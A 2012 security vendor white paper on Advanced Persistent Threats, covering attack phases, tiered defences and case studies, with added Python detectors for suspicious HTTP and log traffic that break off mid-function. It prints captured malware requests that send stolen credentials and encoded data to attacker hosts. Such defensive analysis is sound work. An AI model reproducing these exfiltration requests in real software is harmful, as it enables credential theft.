White Paper: Defending Against Advanced Persistent Threats
January, 2012

Introduction

The publicity associated with the January 2010 news that Google and other large organizations in the Internet, finance, technology, media, and chemical sectors had been targeted by a highly sophisticated, targeted attack has raised awareness of a class of attacks (and attackers) termed the "Advanced Persistent Threat" (APT). Numerous APT attacks have been publicly acknowledged in 2011, including attacks against RSA, Lockheed Martin, L-3 Communications, and the International Monetary Fund.

In 2006, the U.S. Air Force began to use the term "Advanced Persistent Threat" to describe the role of nation states in attacking Internet users. The APT is made up of groups of sophisticated, well-funded attackers, likely state-sponsored, targeting not only U.S. government and national defense targets, but any organization that may maintain or transmit data that could provide their sponsors with any type of competitive advantage. The wide range of industries these attackers have targeted represents a significant challenge to many organizations that had not previously been aware of, or defended against, this class of attack.

An APT is:

Advanced – APTs are intended to operate quietly, looking for high-value data such as software source code or other intellectual property, over an extended period of time. An APT can utilize a wide range of attack capabilities, from use of common tools to the creation of sophisticated custom exploits that target a particular organization. APT attacks typically only utilize the resources necessary to compromise a target. If an organization has poor security controls, a previously published exploit might be used against a well-known vulnerability. However, if a target is well-secured, previously unpublicized zero-day exploits may be used to gain access.

Persistent – Once an Advanced Persistent Adversary (APA) has established access to a targeted environment, the attackers use a variety of techniques to escalate privileges, as well as to establish a permanent, undetectable presence in the environment. Once an APT has established a presence, it can be very difficult to remove. This "persistence" allows the APT to maximize exploitation of information over an extended period. APT attacks are intended to maintain an extended presence in an environment, in order to continually access and extract new and potentially valuable data from the environment.

Threat – APT attacks target organizations to achieve a specific objective. APTs often focus on obtaining and extracting financial, technological, or other information from targeted environments, providing their sponsors with a competitive advantage. APTs utilize human ability and creativity, and are not bots or worms, although similar tools may be employed by the APTs during an attack.

The attacks used by the "APT" attackers are not very different from those used by other intruders. The main differentiator is the APT attacker's perseverance, resources, and sense of purpose to obtain and extract information of value from a target organization. As a target improves its capability to respond, APT attackers will utilize more sophisticated tools and techniques. As a result, APT attacks can present different challenges compared to other types of computer security breaches.

The Advanced Persistent Adversary

Due to the slow, persistent nature of APT attackers, some security researchers refer to this attack type as the Advanced Persistent Adversary (APA) as opposed to the Advanced Persistent Threat. The term APA also puts the focus on the attacker, not the threat: the threat changes for each attack, and the key to a successful APT is the skill of the APA. Quite often, the exploits used by an APA are not particularly advanced or complex. Instead, the APA carefully researches the target and chooses exploits known to result in minimal chances of detection, but which also accomplish the goals of the attack. The APA is slow and methodical, using an array of tactics to execute an attack. As a target improves its defenses, the APA likewise changes tactics to circumvent those defenses while avoiding detection. This makes detecting and stopping an APA that much more difficult. There is no silver bullet technology for thwarting an APA. Instead of relying on traditional defenses and signatures, organizations should look for behavioral characteristics to detect APT attacks.
Seven Phases of an APT Attack

To understand how an APT attack works, it is helpful to understand the lifecycle of such an attack, which typically consists of seven phases. Each phase is discussed in detail below.

1. Planning & Info Gathering

APT attacks often target individuals, groups, or technologies as a mechanism to gain initial access to an environment. They will directly probe a target and perform reconnaissance to gather intelligence. When researching specific people to target at an organization, the APT may utilize the company Web site (list of officers, etc.), LinkedIn, Facebook, Twitter, public records, and of course search engines. The educational tool pleaserobme.com, shown in the screenshot below, can be used to obtain information about Twitter users who post location updates to Twitter.

[Screenshot: Please Rob Me – Twitter Location Tracking Site]

APTs can also obtain information about an organization's Internet presence and technology infrastructure by using tools such as Netcraft, ARIN, and DNSstuff, or via corporate blogs, tech forums, and social engineering. Specific targets are identified (from administrative assistants to officers of the company) based on the information gathered during this phase.

2. Attack and Compromise (Breach)

There are numerous ways an APT may distribute an attack against individuals and groups of users (e.g., e-mail, forums, social media sites, web pages). The most common, e-mail, typically consists of a malicious link or attachment (e.g., PDF, Word, URL) as a starting point to compromise the individual's system. Many of these malicious e-mails are personalized utilizing information gathered during the first phase of the attack, to increase the odds the target opens the e-mail and attachments. This technique is called spear phishing. Here is an example of a spear phishing email:

[Screenshot: spear phishing e-mail example]

3. Establish Command and Control

This phase is typically automated and involves gathering system, network, and user information to gain control of a compromised system. The attack establishes a communication channel to offload information gathered. It may also provide program updates for the malware used during the attack, allowing the attack to mutate and increasing the chances the malicious code is not detected by commercial anti-virus software. This type of evasion technique is known as polymorphing and is very difficult to detect and eradicate since the malware is constantly evolving.

[Screenshot: Malware Command and Control Console Example]
4. Authorization and Credential Theft

The goal of this phase is to obtain user logins and passwords for target systems, especially security and/or critical system devices. Internal systems which utilize a default OEM password or an easily guessable password are at a much higher risk than those implementing strong password requirements. The snippet below was obtained from malware identified during a Solutionary incident response investigation. The malware resides on the host system, captures user credentials submitted to web forms, and forwards the captured credentials to a Latvian IP address controlled by the attacker:

Malware Credential Theft Example

    POST /cgi-bin/forms.cgi HTTP/1.1
    Content-Type: multipart/form-data;
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
    Host: 46.252.130.106
    Content-Length: 286
    Cache-Control: no-cache

    Content-Disposition: form-data; name="upload_file"; filename="910043429.70"
    Content-Type: application/octet-stream

    URL: http://10.10.10.1/login/login.php
    username=Solutionary&password=Solpass
5. Manual Exploitation and Information Gathering

During this phase, the APT utilizes the compromised systems to implement and run additional tools such as keyloggers, decrypters, and network sniffers. These tools are used to gather additional credentials, e-mails, sensitive system data, and additional network information to identify more potential targets. Additionally, the APT begins searching for the sensitive information that is the target and goal of the attack.

6. Data Exfiltration

As the attack spreads from the initial host machine to other systems across the network, information gathered along the way is passed back to the attacker via an external server. APT data exfiltration is often performed in a covert manner, such as hiding data in DNS requests, or in the body of encrypted HTTPS requests. More sophisticated attacks may use steganographic techniques to hide stolen data within other file types.

As mentioned above, most exfiltrations are performed in a covert manner, but recent incidents investigated by Solutionary have identified that Distributed Denial of Service (DDoS) attacks have been used by criminal-based attackers to distract potential victims of APT attacks during exploitation, the data exfiltration stage, or unauthorized access. In one incident, an attacker had compromised a victim network, and attempted a number of wire transfers from victim accounts. Simultaneously, the attacker launched a DDoS attack against the victim. The intent of the DDoS attack was to consume the victim's investigative and technical resources for a period of time so that the wire transfers would go unnoticed.

The HTTP captures below demonstrate a data exfiltration attempt from a compromised system. The malware installed on the system first attempts to communicate back to a command and control system at law-service2011.ru to identify itself (this is the initial GET request). After identifying itself, the malware then begins to send data to the law-service2011.ru system (data exfiltration POST request).

(Figure callouts belonging to the Malware Credential Theft Example above: "Submission to Latvian IP address"; "Original request with user ID 'Solutionary' and password 'Solpass'".)

Data Exfiltration Example

    *** INITIAL GET REQUEST ***
    GET /h=NT5.1.2600-BAD9DDEA.ENU.55274-640-0865063-23775&i=8fpodiqpdoe&o=210631&f=x&si=cjcjjlbobjiidhc&so=1920&tl=21048&v=17&d=NbvGGlnT8Tij4iaL/DmeDlrRHVvlYL4phuKF8VL9Xtg1sU3MaQCH5JZIx0AIXgaySRuSQPOKJuKkQv2xfELmc3g0xppZU/HIo2ImCgi8nng1ERDZCOW9qY6hhoZzT0VrTXtegVFfZ52Svb2r(B4mE3iXnpz7/yV7jaH(…
    …
    /XHWbxiAYj4ljylYOF5HqNZ5J5QyI8l4pZSBbFRO9KIUQTGmklE6tiKfigx5auLUXhRJhbl4MaDmZh9h2aDZVg1bWc8XYBvd46btfLS7SYTUo2PwOH8Jnh53OpAWrbIOVWDxzRBxQg5igctgNZinvhGzAWQ80m(E5n0fgBI30XSMcVd4VoShQiWSq1B2p8ouVINnirZgijDkUjlxmkZypJFGdaQZkwFyZp9Ryf70Kdo HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: law-service2011.ru
    Connection: Keep-Alive

    *** Data Exfiltration POST Request ***
    POST law-service2011.ru HTTP/1.1
    User-Agent: Mozilla/4.1 (compatible; MSIE 17; NT 5.1.2600-BAD9DDEA.ENU.55274-640-0865063-23775)

    8v09RpEKjijmJ0BtpEbPeNMAagsJAaWdzwsHsH7NtGopYQyEbXJ2wX27VhBV1i7mQGkrNqu+fG09ySX9CZnmXQ==|00CSA|
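Both captures in this paper (the credential-theft POST in phase 4 and the exfiltration GET/POST in phase 6) share traits a defender can key on without a malware signature: a POST to a bare IP address, form fields named password in the body, a query parameter that is a long high-entropy blob, and a User-Agent that claims a browser version that never existed. The Python below is an added example, not Solutionary's code and not from this paper: it parses raw HTTP requests and flags those traits. The sample requests are constructed, modelled on the captures above (the hostnames are those shown in the captures; the credentials and the short beacon payload are made up), and the thresholds (64-character minimum, 4.0 bits of entropy) are assumptions for illustration.

```python
import math
import re
from collections import Counter
from ipaddress import ip_address
from urllib.parse import parse_qsl, urlsplit

# Constructed sample requests modelled on the captures in the paper.
# Hostnames are those shown in the captures; credentials and payloads are made up.
CREDENTIAL_POST = (
    "POST /cgi-bin/forms.cgi HTTP/1.1\r\n"
    "Content-Type: multipart/form-data;\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\n"
    "Host: 46.252.130.106\r\n"
    "Content-Length: 286\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    'Content-Disposition: form-data; name="upload_file"; filename="910043429.70"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "URL: http://10.10.10.1/login/login.php\r\n"
    "username=jdoe&password=not-a-real-password\r\n"
)
BEACON_GET = (
    "GET /h=NT5.1.2600-BAD9DDEA.ENU.55274-640-0865063-23775&i=8fpodiqpdoe&o=210631"
    "&f=x&si=cjcjjlbobjiidhc&so=1920&tl=21048&v=17"
    "&d=NbvGGlnT8Tij4iaL/DmeDlrRHVvlYL4phuKF8VL9Xtg1sU3MaQCH5JZIx0AIXgaySRuSQPOKJuKkQv2xfELmc3g0xppZU"
    " HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"
    "Host: law-service2011.ru\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
BEACON_POST = (
    "POST law-service2011.ru HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.1 (compatible; MSIE 17; NT 5.1.2600-BAD9DDEA.ENU.55274-640-0865063-23775)\r\n"
    "\r\n"
    "8v09RpEKjijmJ0BtpEbPeNMAagsJAaWdzwsHsH7NtGopYQyEbXJ2wX27VhBV1i7mQGkrNqu+fG09ySX9CZnmXQ==|00CSA|\r\n"
)
BENIGN_GET = (
    "GET /search?q=apt+defense HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36\r\n"
    "\r\n"
)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    target = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def shannon_entropy(text: str) -> float:
    """Bits per character; long encoded or encrypted blobs score well above plain text."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def query_params(target: str):
    """Return query parameters; the beacon in the paper puts them in the path ('/h=...&i=...')."""
    parts = urlsplit(target)
    query = parts.query or (parts.path.lstrip("/") if "=" in parts.path else "")
    return parse_qsl(query, keep_blank_values=True)


def analyze(raw: str, blob_len: int = 64, entropy_bits: float = 4.0) -> list:
    """Return the list of suspicious traits found in one request (empty if none)."""
    req = parse_request(raw)
    findings = []
    host = req["headers"].get("host", "").split(":")[0]
    try:
        ip_address(host)
        host_is_ip = True
    except ValueError:
        host_is_ip = False
    if not host:
        findings.append("missing_host_header")            # HTTP/1.1 requires a Host header
    if host_is_ip and req["method"] == "POST":
        findings.append("post_to_raw_ip")                  # no DNS name: no reputation, no proxy category
    if re.search(r"(?i)(^|[&\s])pass(word|wd)?=", req["body"]):
        findings.append("credentials_in_body")             # form credentials leaving the host
    for name, value in query_params(req["target"]):
        if len(value) >= blob_len and shannon_entropy(value) > entropy_bits:
            findings.append(f"high_entropy_param:{name}")  # encoded data smuggled in a GET
    m = re.search(r"MSIE\s*(\d+)", req["headers"].get("user-agent", ""))
    if m and int(m.group(1)) > 11:
        findings.append("implausible_user_agent")          # Internet Explorer never reached version 12
    return findings


if __name__ == "__main__":
    for label, sample in [("credential POST", CREDENTIAL_POST), ("beacon GET", BEACON_GET),
                          ("beacon POST", BEACON_POST), ("benign GET", BENIGN_GET)]:
        print(f"{label}: {analyze(sample) or 'clean'}")
```

Each finding on its own is weak (plenty of legitimate software posts to raw IPs), which is why the script reports traits rather than a verdict; in practice they would feed a score or a correlation rule in a log monitoring platform, with the credential and beacon cases paired with the destination's reputation.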
7. Maintain Persistence

During this phase, multiple attack vectors are seeded into the compromised hosts and lie in wait. Some of these exploits may be decoys or tools that have already served their purpose, which may be identified and removed without affecting the main exploit(s). For example, an organization may take an affected system offline to remove known threats detected by anti-virus. Once detected threats have been remediated, the system is put back online. At this time, the undetected malware resumes communications with the command and control infrastructure for further instructions.

One critical note: based on Solutionary's experience, when organizations identify and eradicate a breach, monitoring and notification efforts for breaches must improve. There are two reasons that necessitate this increased vigilance:

1. If a breach is detected, there may be additional systems compromised, using potentially different techniques, waiting to be utilized by the attacker. APTs are likely to compromise numerous systems, but use only one of the systems for a period. If that compromised system is detected and remediated, the APT will simply utilize another compromised system that has not been detected, to maintain persistence.

2. If an organization is the victim of, or has detected, a prior sophisticated attack, it is likely there is data in the organization that is of interest to the attackers. Since no effective mechanisms exist to prosecute these attackers, there is little risk to the attackers in continuing their attempts to access that information.
Ways to Protect Against APTs

Any organization may be the target of an APT attack. Even organizations that may not consider themselves a target need to consider that information such as customer data, partner data, employee data, merger and acquisition activity, and resources shared with other organizations may be targeted in an attack. Additionally, organizations must identify security weaknesses in their environment that could be used as a base of attack against customers or business partners who may have information of interest to APT actors.

There are specific controls Solutionary recommends that all organizations implement to provide basic protection against APT attacks. Organizations believing they are at higher risk of being targets of an APT attack should consider more granular controls. Organizations previously targeted by APT attacks should consider enhancing detective and preventative controls. More information about the different tiers of control is presented in the Potential Defense Strategies Against the Advanced Persistent Threat diagram later in this white paper.

While every organization must make decisions about security control strategies based on their unique circumstances, the intent of these tiered defense strategies is to provide organizations with general conceptual outlines of potential actions to consider. This guidance is not intended to replace existing information security programs and best practices, but is intended to highlight areas of focus for organizations to better protect against the Advanced Persistent Threat. Recommended actions for the three threat tiers are presented below.

All Organizations

Asset and Data Classification and Flow (SANS CSC #1 and #2)
All organizations must identify their most critical assets, including financial and intellectual property assets, and ensure existing security programs, as well as future security investments, focus on the monitoring and protection of those assets.

Security Awareness Training (SANS CSC #20)
Most APT attacks include a social engineering component to gain an initial foothold in the environment. Spear-phishing (phishing attacks targeted against individuals) has been used in numerous publicized APT attacks. Traditional social engineering techniques, such as phone calls, have also been used in APT attacks. The common use of social engineering in APT attacks highlights the importance of training critical employees (especially executives, financial personnel, research teams, and other employees who have access to sensitive or confidential data) to recognize potentially suspicious e-mails and social engineering attacks, as well as proper incident response and notification procedures. Social networking sites are a growing source of personal information used by APT attackers to gather intelligence for targeting their victims. Therefore, it is also important for organizations to have clear policies addressing access to these sites using corporate resources, as well as policies to remind employees about what types of information are allowed and not allowed to be posted to public social media sites.

Regular Security Testing (SANS CSC #4, #6, #7)
Regular security testing, including vulnerability assessments, penetration tests, application security assessments, and audits of potentially sensitive technologies (such as wireless environments), should be conducted to identify and remediate potential security vulnerabilities that could be exploited as part of an APT attack.

Appropriate Use of Critical Systems (SANS CSC #12)
User systems which support mission-critical processes, or transmit mission-critical data, should enforce stricter Appropriate Use standards than typical user systems. For example, systems used to perform financial transactions should not also be given permission to perform general Internet browsing.
NOTE: Case Study 1 presented in this paper discusses an infection that likely originated from personal use of a mission-critical device.

Secure Credential Distribution
User credentials should not be distributed via mechanisms accessible by an attacker, such as plain-text e-mails, or via instant messaging (where the information may be kept in session logs).
NOTE: Case Study 1 presented later in this paper discusses an infection where an attacker obtained numerous account credentials by reviewing the e-mail history of a system administrator who had sent credentials to users via plain-text e-mail.

System Patching and Hardening (SANS CSC #3 and #4)
APT attacks can gain a foothold in an organization's environment by exploiting previously published vulnerabilities. To protect against this threat, organizations must ensure all technologies accessing external resources are configured according to secure hardening standards (to disable potentially unnecessary and insecure functionality), and are patched to remediate security vulnerabilities on a regular basis.
NOTE: In numerous incident investigations performed by Solutionary, including Case Studies 1 and 2 presented in this document, significant gaps in patching existed, which were potential mechanisms by which APT attacks gained a foothold in the environment.

Anti-virus / Anti-Spyware (SANS CSC #5)
Although highly sophisticated APT attacks may not be detected by anti-virus software, anti-virus can still be an effective tool against less sophisticated attacks. Different anti-virus products have different levels of effectiveness against different types of attacks. Therefore, it is advisable, where possible, to implement anti-virus protection from multiple vendors in enterprise environments. These protections should be implemented at the end-user desktop and at various ingress and egress points within the network. Layered defenses, such as desktop anti-virus, mail gateway anti-virus, and protocol-aware proxies, can significantly reduce the likelihood of successful attacks.
NOTE: Case Study 3 of this report demonstrates the effectiveness of different anti-virus vendors against a compromised customer device.

Incident Response Capabilities (SANS CSC #18)
Organizations must implement an effective incident response program. This includes the identification and creation of an incident response team in the organization's incident response policies, and performing regular tests to ensure the team is effective in fulfilling its mission. This includes regular training of technical personnel, dry runs of response scenarios, and reviews of and documentation/feedback on existing incidents in the corporate environment.
NOTE: In almost all incident response investigations performed by Solutionary, poor incident response procedures resulted in ineffective response. As a result, incidents that should have been contained or mitigated were allowed to persist in environments, increasing the chances of significant damage being inflicted on the environment and exposure to greater financial loss potential for the organization.

User Account and Privilege Auditing (SANS CSC #12, #15)
All organizations should perform regular reviews of user accounts and account permissions, to ensure that any unnecessary or unused accounts are disabled or deleted, and that all accounts have only the permissions required to fulfill their operational function.

Log Monitoring (SANS CSC #14)
Ensure detailed security logs are generated from all critical and Internet-facing systems, and that logs are reviewed regularly to identify potential security events and anomalous activity.
NOTE: In Case Study 1 presented in this paper, an initial infection was identified by anti-virus. However, since the anti-virus logs were not monitored or reviewed, and malicious activity blocking was not enabled, the infection was not noticed until 20 days after the initial infection.
Possible APT Targets

In addition to the controls identified for All Organizations, the following controls should be considered by organizations which maintain information that could potentially be targeted in an APT attack.

Data Loss Prevention (SANS CSC #17)
Implement a data loss prevention solution to monitor, detect, and prevent the unauthorized use or transmission of critical organizational data.

Security Intelligence Service
A subscription to a security intelligence service can assist organizations in identification of necessary critical patches, as well as an understanding of current zero-day attacks and other global security events and trends that may affect the organization.

Advanced Detection and Response Training (SANS CSC #9)
Advanced security event, network traffic, and communication flow detection (Command & Control, Egg Download, Spawning, DNS probes, etc.), and incident response training should be provided for key information security and incident response personnel.

Segmentation of Key Assets (SANS CSC #13)
Implementation of network isolation and segmentation of key network assets and systems that directly access key assets and data (such as customer service representative workstations). As an example, CSR workstations that can access customer data should be on a separate network segment from the general user population, and should have highly restricted outbound Internet access.

Sensitive User Auditing (SANS CSC #16)
APT attacks often use compromised accounts to access sensitive data. Detailed auditing and monitoring of sensitive account activity can assist organizations in identification of suspicious or unauthorized activity.
NOTE: Case Studies 1 and 4 presented in this paper describe incidents where attackers conducted fraudulent activity using valid user accounts, as well as accounts the attackers had created specifically to perform fraudulent activity. Auditing and monitoring of these critical accounts and fraudulent transactions might have allowed the attacks to be detected much earlier.

Network Anomaly Detection (SANS CSC #14)
Beyond identification of known security alerts and signatures, organizations should perform network traffic and protocol trending. Deviations from established baselines could be indicative of malicious activity.

Granular Outbound Firewall Rules (Egress Filtering) (SANS CSC #11, #13, #19)
Without exception, APT attacks attempt to call back to their operators, either to receive command and control instructions, or to export critical data. Restrictions on outbound firewall access for all systems can limit the potential success of this communication.
Known APT Targets

In addition to the controls listed above for All Organizations and Possible APT Targets, the following controls should be considered by organizations maintaining information known to be valuable to APT, or which have previously been targeted by APT.

Advanced Malware Analysis Training (SANS CSC #9)
Sophisticated APT attacks often utilize customized malware. Organizations that are known APT targets should employ personnel (or retain consultants) with detailed malware analysis and reverse engineering skill sets to quickly analyze suspicious traffic or files identified in the environment, as well as to provide support to forensics investigations.

Data Destruction and Cleanup
Implement programmatic controls to ensure that outdated and unnecessary data is removed from servers and workstations, to limit potential losses in the event of a compromise.
NOTE: Case Studies 1 and 2 presented in this paper describe incidents where outdated data resided on compromised systems. This data was unnecessarily exposed as part of the compromise.

Anomalous Transaction Monitoring (SANS CSC #14)
For applications that perform highly sensitive transactions (such as financial transfers), identification and review of anomalous transactions should be performed to ensure the activity is valid.
NOTE: Case Studies 1 and 4 presented in this paper describe incidents where attackers conducted fraudulent activity using valid user accounts, as well as accounts the attackers had created specifically to perform fraudulent activity. Auditing and monitoring of these critical accounts and fraudulent transactions may have allowed the attacks to be detected much earlier.

Detailed Packet Inspection (SANS CSC #14)
Where possible, traffic from critical systems should be captured and analyzed to detect potential malicious traffic.

Outbound Traffic Monitoring (SANS CSC #14)
Without exception, APT attacks attempt to call back to their operators, either to receive instructions, or to export critical data. Monitoring and analyzing outbound traffic patterns could alert an organization to a potential APT intrusion.

DDoS Defense Measures
Evaluate areas of weakness to DDoS attacks which could potentially impact logging, alerting, communication, and other business functions, along with potential ways to defend or protect infrastructure components from disruptions. Most importantly, validate that the incident response plan accommodates DDoS conditions. See blog post: http://blog.solutionary.com/blog/Tag=DDoS

Conclusion and Recommendations

The APT threat includes techniques that are more difficult to detect because the adversary, when faced with an above-average defense, does not move on to a weaker target.
The adversary is persistent and will escalate tactics. The APT's focus is on stealing intellectual property rather than money, to advance the adversary's strategic technical, economic, political, and military goals. Patience and resilience are what make these attacks so successful.

Organizations must be vigilant against a wide variety of sophisticated and unsophisticated threats executed by technical and nontechnical hackers. Almost daily, news reports of new attacks or security breaches of an enterprise system or network are publicized. The topic of network security is continuously in the business headlines and, increasingly, discussed in boardrooms.

An independent risk assessment is one of the most important steps an organization can take to protect itself against APTs and other threats. Organizations should identify risks to information technology systems and assets. This will help prioritize protection for the most "at-risk" systems. It will also allow management to rank the order of remediation plans and efforts and align these efforts to available resources. An enterprise risk assessment can capture the scope of potential risks, and is the first step in reducing an organization's overall risk in the most effective and efficient manner. The most at-risk systems and highest-liability assets that hold the most critical data will then be categorized and (once resources are identified to remedy these risks) the overall risk to the organization will be lowered in the most expeditious manner. Organizational risk assessment must be an on-going process, continually updated to account for new threats, as well as organizational changes (adoption of new technologies, integration with new partners, mergers and acquisitions). A risk assessment performed today can be an outdated artifact tomorrow.

Faced with these challenges and realities, an enterprise should apply due diligence to evaluate all its options. One of those options is a relationship with a credible Managed Security Services Provider (MSSP). Considering advancing security threats, and what inadequate security can cost, the time may be right to evaluate MSSPs.

Solutionary's ActiveGuard platform is an ideal tool for identifying and evaluating APT threats. Solutionary monitors clients 24x7x365. Seeing new threats as they arise, Solutionary's experts recognize all the various ways attacks can be perpetrated. Solutionary has the ability to see low-and-slow attacks, has the digital forensics knowledge to dissect complex and advanced attack scenarios, and analyzes attacks across a large base of customers. Solutionary can quickly identify emerging trends, patterns, and anomalies due to the large volume of information we continually analyze from a variety of organizations globally. Effective use of all this intelligence allows Solutionary to provide global customer protection based on identified threats or attacks against individual customers. ActiveGuard analyzes log feeds from almost any source, including applications, databases, servers, and endpoint systems. Attacks evading anti-virus or Intrusion Detection Systems (IDS) may still leave a fingerprint in firewall or system logs, or create traffic patterns in the environment identified by anomaly detection. In addition, malicious host identification and detection capabilities give Solutionary the ability to detect threats based upon who and where an attack is coming from.

Potential Defense Strategies for the Advanced Persistent Threat

There is no magic bullet to combat sophisticated, motivated APAs with significant resources. Defending against these threats requires a strategic approach across all security domains. This diagram identifies different approaches for organizations with different levels of risk to APT.

[Diagram: Potential Defense Strategies for the Advanced Persistent Threat]
APT Case Studies

Solutionary Security Consulting Services (SCS) and the Solutionary Engineering Research Team (SERT) provide incident response services to assist organizations in the investigation of potential APT attacks, as well as other malware infections and security incidents in their environments. Overviews of four recent incident response investigations performed by Solutionary are presented in the following sections. Each of these investigations has key characteristics that relate specifically to the control strategies discussed in this paper. The intent of these case studies is not to provide a detailed walkthrough of every step of the incident response process for each, but to highlight key aspects of each investigation that may be of interest to a larger audience.

One takeaway from all of these case studies is that multiple forms of effective detection are required to defend organizations against APT and other sophisticated malware attacks, and that reliance on anti-virus products to defend an organization against attacks is not a feasible strategy in current network environments. Another key point is that sophisticated attacks are not impossible to detect or defend against. In the case studies presented below, implementation of common security controls, or improved monitoring of existing controls, could have allowed the customer to detect the attack much earlier, or potentially stopped the attack entirely.
Case Study 1 – Zero-Day Attack Against Banking Application

Introduction

This case study involves the investigation of an incident that occurred on the network of a national non-profit organization, initiated by a zero-day Trojan infection in the environment. This case study offers an important reminder for organizations to effectively utilize technologies already in place in their environment. This attack completely evaded the corporate intrusion detection system. Many Trojan/virus-based infections are transmitted and propagated via legitimate traffic, such as email or malicious websites. Standard IDS signatures do not identify this type of activity, and outbound malicious traffic did not trigger an alert. However, activities associated with this attack were identified by numerous technologies in the customer environment, but the poor configuration and lack of monitoring of these technologies allowed the attack to go undetected.

Incident Timeline – Case Study 1

Day 1 – McAfee ePolicy Orchestrator identifies infection activity on a user PC in the customer environment. However, this activity was not reported to the enterprise management console, and was not blocked by the anti-virus application that detected it (which was not monitored full-time or in an active blocking mode).
Day 19 – Host-based IPS detects hundreds of critical events. This activity was not reported to the enterprise console, not blocked by the IPS, and not monitored in any way.
Day 20 – Websense content filtering software identifies hundreds of requests in a 60-second span to a malicious command and control site.
Day 21 – Customer's partner bank contacts customer regarding improper wire transfers being submitted from the customer network.
Day 22 – Customer identifies PCs and users associated with anomalous transactions, and removes systems from the network.
Day 22 – Customer alerts the Federal Bureau of Investigation (FBI) and Solutionary.
Day 27 – Solutionary implements custom monitoring in the customer network; 60 additional infected hosts are identified in the environment.
Day 27-37 – Solutionary identifies malware evidence on systems, as well as access to numerous systems by multiple hacking groups.

Incident Analysis

The unfortunate aspect of this incident is that it could have been avoided, or at least identified much sooner, by effective configuration and monitoring of technologies already in place in the environment. The following points highlight technologies in place in the customer environment that detected the malicious activity, but were not adequately monitored by the customer:

Anti-virus Configuration and Monitoring – While the infected system had anti-virus monitoring in place that detected what was likely the initial infection, the anti-virus did not block the malicious activity, and no monitoring of the system was in place, so the activity went completely undetected until the customer was notified of the improper wire transfers by their bank partner.

Log Monitoring - Host-Based IPS Monitoring – The host-based IPS running on the infected system was not configured to report alerts to the enterprise security console, nor was it configured to block potentially malicious activity. As a result, the customer was unaware of numerous alerts (including almost 100 critical alerts in a 2-hour period on Day 19) issued by the IPS during the incident.

Log Monitoring - Websense Monitoring – The Websense content filtering system in place in the customer environment generated hundreds of alerts related to infection activity; however, no monitoring of the Websense logs was performed.

Log Monitoring - Windows Event Log Monitoring – The Windows Event logs on infected systems generated alerts related to infection activity; however, no monitoring of Windows Event logs was performed on critical systems.

Outbound Traffic Monitoring – Based on Solutionary's analysis of security logs in the environment, the infected systems generated significant network activity in attempts to obtain outbound Internet access to contact command and control systems. This activity was logged in outbound firewall and proxy server logs; however, these logs were not being actively monitored by the customer.
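The two outbound-traffic findings in this case (hundreds of requests in a 60-second span to one command and control site, and repeated attempts to obtain outbound Internet access that the firewall logged) are patterns a simple scheduled review of the proxy and firewall logs would have surfaced. The Python below is an added example, not Solutionary's code and not from this paper: it runs a sliding-window burst detector and a denied-connection counter over a constructed log. The line format (timestamp, src=, dst=, action=), the hosts, and the thresholds (100 requests per 60 seconds, 10 denied attempts) are assumptions for illustration; the destination names are the ones that appear in this paper's captures.

```python
import re
from collections import Counter, deque
from datetime import datetime, timedelta

# Assumed log format (not Solutionary's): one line per outbound connection.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) action=(?P<action>allow|deny)$"
)


def build_sample_log() -> list:
    """Constructed sample log (not real data), modelled on the Case Study 1 timeline:
    one workstation sends hundreds of requests to a C2 host inside a minute and
    repeatedly hits a deny rule; a second workstation browses normally."""
    base = datetime(2012, 1, 20, 9, 0, 0)
    lines = []
    for i in range(6):  # benign: six requests spread over half an hour
        ts = base + timedelta(minutes=5 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} src=10.1.2.4 dst=www.example.com action=allow")
    for i in range(150):  # burst: 150 requests in 45 seconds
        ts = base + timedelta(seconds=0.3 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} src=10.1.2.3 dst=law-service2011.ru action=allow")
    for i in range(25):  # blocked call-backs to a raw IP over ten minutes
        ts = base + timedelta(seconds=24 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} src=10.1.2.3 dst=46.252.130.106:443 action=deny")
    return lines


def parse_log(lines) -> list:
    """Return (timestamp, src, dst, action) tuples in time order; unparsable lines are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            events.append((datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                           m["src"], m["dst"], m["action"]))
    events.sort()
    return events


def detect_bursts(lines, window_seconds=60, threshold=100) -> dict:
    """Map (src, dst) -> peak request count inside any window of window_seconds,
    reported only for pairs that reached the threshold."""
    window = timedelta(seconds=window_seconds)
    recent = {}   # (src, dst) -> deque of timestamps still inside the window
    peaks = {}
    for ts, src, dst, _action in parse_log(lines):
        dq = recent.setdefault((src, dst), deque())
        dq.append(ts)
        while ts - dq[0] > window:   # slide the window forward
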